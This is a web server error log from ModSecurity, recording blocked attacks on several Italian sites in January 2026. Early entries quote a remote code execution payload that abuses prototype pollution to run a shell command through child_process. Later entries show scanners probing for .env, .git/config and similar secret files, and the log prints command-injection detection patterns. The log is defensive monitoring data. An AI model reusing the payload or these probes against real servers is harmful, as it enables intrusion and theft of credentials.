[Thu Jan 15 10:58:03.035225 2026] [:error] [pid 1422356] [client 85.11.167.4:39956] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768471082',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6K9iVwBGA_Exl618JiQAAAAM"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:03.035344 2026] [:error] [pid 1422356] [client 85.11.167.4:39956] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768471082',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6K9iVwBGA_Exl618JiQAAAAM"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:03.035428 2026] [:error] [pid 1422356] [client 85.11.167.4:39956] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1768471082 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6K9iVwBGA_Exl618JiQAAAAM"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:03.036516 2026] [:error] [pid 1422356] [client 85.11.167.4:39956] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6K9iVwBGA_Exl618JiQAAAAM"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:03.036693 2026] [:error] [pid 1422356] [client 85.11.167.4:39956] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6K9iVwBGA_Exl618JiQAAAAM"], referer: https://economiasolidale.38121.it
[Thu Jan 15 15:03:10.600853 2026] [authz_core:error] [pid 1422355] [client 20.196.88.31:3431] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Http
[Thu Jan 15 15:03:12.780574 2026] [authz_core:error] [pid 1422355] [client 20.196.88.31:3431] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Http
[Thu Jan 15 20:59:46.649272 2026] [authz_core:error] [pid 1435201] [client 165.22.34.189:42864] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jan 15 20:59:49.655014 2026] [:error] [pid 1422357] [client 165.22.34.189:40918] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aWlHNfDjrFi-ACGrsdg_3AAAAAQ"]
[Thu Jan 15 20:59:49.655234 2026] [:error] [pid 1422357] [client 165.22.34.189:40918] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aWlHNfDjrFi-ACGrsdg_3AAAAAQ"]
[Thu Jan 15 20:59:49.655408 2026] [:error] [pid 1422357] [client 165.22.34.189:40918] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aWlHNfDjrFi-ACGrsdg_3AAAAAQ"]
[Thu Jan 15 20:59:50.652812 2026] [:error] [pid 1422356] [client 165.22.34.189:40932] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWlHNtiVwBGA_Exl618JzwAAAAM"]
[Thu Jan 15 20:59:50.653023 2026] [:error] [pid 1422356] [client 165.22.34.189:40932] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWlHNtiVwBGA_Exl618JzwAAAAM"]
[Thu Jan 15 20:59:50.653176 2026] [:error] [pid 1422356] [client 165.22.34.189:40932] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWlHNtiVwBGA_Exl618JzwAAAAM"]
[Thu Jan 15 20:59:52.653683 2026] [:error] [pid 1422353] [client 165.22.34.189:40940] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWlHOOHSrxAFNBAHObbgfwAAAAA"]
[Thu Jan 15 20:59:52.653919 2026] [:error] [pid 1422353] [client 165.22.34.189:40940] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWlHOOHSrxAFNBAHObbgfwAAAAA"]
[Thu Jan 15 20:59:52.654075 2026] [:error] [pid 1422353] [client 165.22.34.189:40940] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWlHOOHSrxAFNBAHObbgfwAAAAA"]
[Thu Jan 15 20:59:57.922926 2026] [authz_core:error] [pid 1422355] [client 146.190.63.48:34720] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jan 15 21:00:00.919613 2026] [:error] [pid 1435200] [client 146.190.63.48:35858] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWlHQLyljC8a6dfEyobBCAAAAAk"]
[Thu Jan 15 21:00:00.919846 2026] [:error] [pid 1435200] [client 146.190.63.48:35858] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWlHQLyljC8a6dfEyobBCAAAAAk"]
[Thu Jan 15 21:00:00.920028 2026] [:error] [pid 1435200] [client 146.190.63.48:35858] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWlHQLyljC8a6dfEyobBCAAAAAk"]
[Thu Jan 15 21:00:01.930256 2026] [:error] [pid 1422397] [client 146.190.63.48:35874] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWlHQdRjIwPDVBl58FeyDAAAAAY"]
[Thu Jan 15 21:00:01.930520 2026] [:error] [pid 1422397] [client 146.190.63.48:35874] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWlHQdRjIwPDVBl58FeyDAAAAAY"]
[Thu Jan 15 21:00:01.930721 2026] [:error] [pid 1422397] [client 146.190.63.48:35874] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWlHQdRjIwPDVBl58FeyDAAAAAY"]
[Thu Jan 15 21:00:03.931357 2026] [:error] [pid 1435201] [client 146.190.63.48:35880] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWlHQwqtKbcHCWblG8ercgAAAAo"]
[Thu Jan 15 21:00:03.931591 2026] [:error] [pid 1435201] [client 146.190.63.48:35880] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWlHQwqtKbcHCWblG8ercgAAAAo"]
[Thu Jan 15 21:00:03.931760 2026] [:error] [pid 1435201] [client 146.190.63.48:35880] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWlHQwqtKbcHCWblG8ercgAAAAo"]
[Thu Jan 15 22:44:39.561821 2026] [:error] [pid 1422353] [client 2.57.122.173:41348] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWlfx-HSrxAFNBAHObbgiwAAAAA"]
[Thu Jan 15 22:44:39.562085 2026] [:error] [pid 1422353] [client 2.57.122.173:41348] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWlfx-HSrxAFNBAHObbgiwAAAAA"]
[Thu Jan 15 22:44:39.562250 2026] [:error] [pid 1422353] [client 2.57.122.173:41348] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWlfx-HSrxAFNBAHObbgiwAAAAA"]
[Fri Jan 16 03:13:54.933343 2026] [:error] [pid 1444226] [client 45.148.10.246:46788] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme4mcpoCUgeFICb0bczgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Fri Jan 16 03:13:54.933620 2026] [:error] [pid 1444226] [client 45.148.10.246:46788] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme4mcpoCUgeFICb0bczgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Fri Jan 16 03:13:54.933800 2026] [:error] [pid 1444226] [client 45.148.10.246:46788] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme4mcpoCUgeFICb0bczgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Fri Jan 16 03:13:55.148094 2026] [:error] [pid 1444040] [client 45.148.10.246:46804] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env/"] [unique_id "aWme4_n_5sIyKhJ5GAzXpgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env/
[Fri Jan 16 03:13:55.148358 2026] [:error] [pid 1444040] [client 45.148.10.246:46804] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env/"] [unique_id "aWme4_n_5sIyKhJ5GAzXpgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env/
[Fri Jan 16 03:13:55.148533 2026] [:error] [pid 1444040] [client 45.148.10.246:46804] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env/"] [unique_id "aWme4_n_5sIyKhJ5GAzXpgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env/
[Fri Jan 16 03:13:55.333014 2026] [:error] [pid 1444031] [client 45.148.10.246:46820] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme43-9MmrgwjmYTAJQYgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env
[Fri Jan 16 03:13:55.333244 2026] [:error] [pid 1444031] [client 45.148.10.246:46820] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme43-9MmrgwjmYTAJQYgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env
[Fri Jan 16 03:13:55.333418 2026] [:error] [pid 1444031] [client 45.148.10.246:46820] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWme43-9MmrgwjmYTAJQYgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env
